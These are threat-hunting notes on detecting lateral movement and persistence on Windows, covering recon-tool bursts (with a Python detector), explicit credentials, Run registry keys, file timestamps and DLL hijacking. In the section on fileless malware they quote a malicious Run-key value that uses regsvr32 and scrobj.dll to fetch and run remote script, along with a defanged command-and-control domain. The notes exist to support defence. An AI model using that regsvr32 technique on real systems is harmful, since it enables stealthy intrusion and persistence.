Detecting lateral movement
Typically, the endpoint first compromised by an attacker isn't their final objective
Most people don't put their crown jewel database in the DMZ
In order to find their final objective, attackers need to undergo an exploratory phase, moving laterally throughout the network
The actions taken during this exploratory phase can be a helpful indicator
Processes
Once an adversary has gained access to a machine, they perform reconnaissance
Username, privilege level, running services, other reachable machines, etc
While they can use specialized malware for doing this, legitimate system processes work just as well:
Windows: net.exe, ipconfig.exe, whoami.exe, nbtstat.exe, etc
An attacker tends to run several of these processes within a shorter-than-usual period of time
This deviation from the normal cadence of use is a potential indicator of attack
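As an added illustration that is not part of the original notes, the following Python detector looks for the pattern just described: several different recon utilities launched by the same host/user inside a short window. It runs over constructed process-creation records in a simplified timestamp/host/user/image form rather than real 4688 or Sysmon events; the tool list, the five-minute window and the three-tool threshold are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Recon utilities named in the notes plus common equivalents (assumed list, lower-case basenames)
RECON_TOOLS = {"net.exe", "net1.exe", "ipconfig.exe", "whoami.exe", "nbtstat.exe",
               "netstat.exe", "tasklist.exe", "systeminfo.exe"}

# Constructed sample records: "<ISO timestamp> <host> <user> <image path>", not real logs
SAMPLE_EVENTS = """\
2024-05-01T09:00:01 WS01 alice C:\\Windows\\System32\\ipconfig.exe
2024-05-01T09:00:05 WS01 alice C:\\Windows\\System32\\whoami.exe
2024-05-01T09:00:09 WS01 alice C:\\Windows\\System32\\net.exe
2024-05-01T09:00:20 WS01 alice C:\\Windows\\System32\\nbtstat.exe
2024-05-01T10:15:00 WS02 bob C:\\Windows\\System32\\ipconfig.exe
2024-05-01T14:40:00 WS02 bob C:\\Windows\\System32\\whoami.exe
2024-05-01T09:01:00 WS03 svc C:\\Windows\\System32\\notepad.exe
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (.+)$")

def parse_events(text):
    """Parse records into (timestamp, host, user, image basename) tuples; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, host, user, image = m.groups()
        events.append((datetime.fromisoformat(ts), host, user, image.rsplit("\\", 1)[-1].lower()))
    return events

def find_recon_bursts(events, window=timedelta(minutes=5), min_distinct=3):
    """Alert when one (host, user) runs >= min_distinct *different* recon tools within `window`.
    Distinct tools rather than raw counts, so a script looping net.exe alone does not trip it."""
    per_actor = defaultdict(list)
    for ts, host, user, image in events:
        if image in RECON_TOOLS:
            per_actor[(host, user)].append((ts, image))
    alerts = []
    for (host, user), runs in per_actor.items():
        runs.sort()
        start = 0
        for end in range(len(runs)):          # sliding window over this actor's recon runs
            while runs[end][0] - runs[start][0] > window:
                start += 1
            tools = {img for _, img in runs[start:end + 1]}
            if len(tools) >= min_distinct:
                alerts.append((host, user, runs[start][0], runs[end][0], sorted(tools)))
                break                          # one alert per actor is enough for triage
    return alerts
```

Tuning note: baseline the window and threshold against admin and helpdesk activity first, so that routine scripted inventory runs are whitelisted rather than alerted on.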
Explicit credentials use (Windows)
Windows provides users with the ability to authenticate using explicit credentials
This is designed to allow batch operations
Explicit credentials are also used in pass-the-hash attacks
Use of explicit credentials should be monitored on Windows machines:
Authorized uses should be whitelisted
Unauthorized use should be investigated as a potential attack
Hunting for registry and system file changes
The Windows registry and system files carry a lot of power over the system
The registry decides what is run at boot
System files can be run with elevated privileges
When hunting for threats in a Windows registry or system files, check for the following:
Registry persistence mechanisms
Changes to the registry
File creation/modify dates
Evidence of DLL hijacking
Registry persistence mechanisms
As mentioned previously, the registry is a common target for malware attempting to achieve persistence across reboots
Registry keys of interest include:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Registry changes
Fileless malware
Fileless malware has become more common lately to avoid antivirus detection
JS_POWMET uses an AutoStart registry procedure to download itself to the system:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run COM+ ="regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll"
This installs the PowerShell script backdoor trojan TROJ_PSINJECT and connects to the following website:
hxxps://bogerando[.]ru/favicon
Enabling registry auditing
Registry auditing is a feature offered by Windows to help detect malware's use of the registry as a persistence mechanism
Activating registry auditing is one of the security settings available under Active Directory or local group policy
Once auditing is enabled, you will need to use regedit.exe to open the registry and then manually choose every key that you would like to monitor
Checking file timestamps
File timestamps can be a valuable indicator of compromise when system files are modified
Most files in the system directories should have the same or similar timestamps (from when the system was last installed or updated)
Any .exe or .dll with a different timestamp may be worth investigating
Look for timestamps near the time of the suspected attack
Timestamps can be modified using time stomping, but this is a more involved process
Not all attackers will take the time and effort to change all versions of a file's timestamps
Hunting for system file changes
DLLs and drivers are other potential targets of an advanced adversary
These files may be run by trusted processes, allowing malicious code to run in a trusted process, potentially with elevated permissions
Examination of DLLs and drivers (using driverquery) for anomalous values can be valuable for threat hunting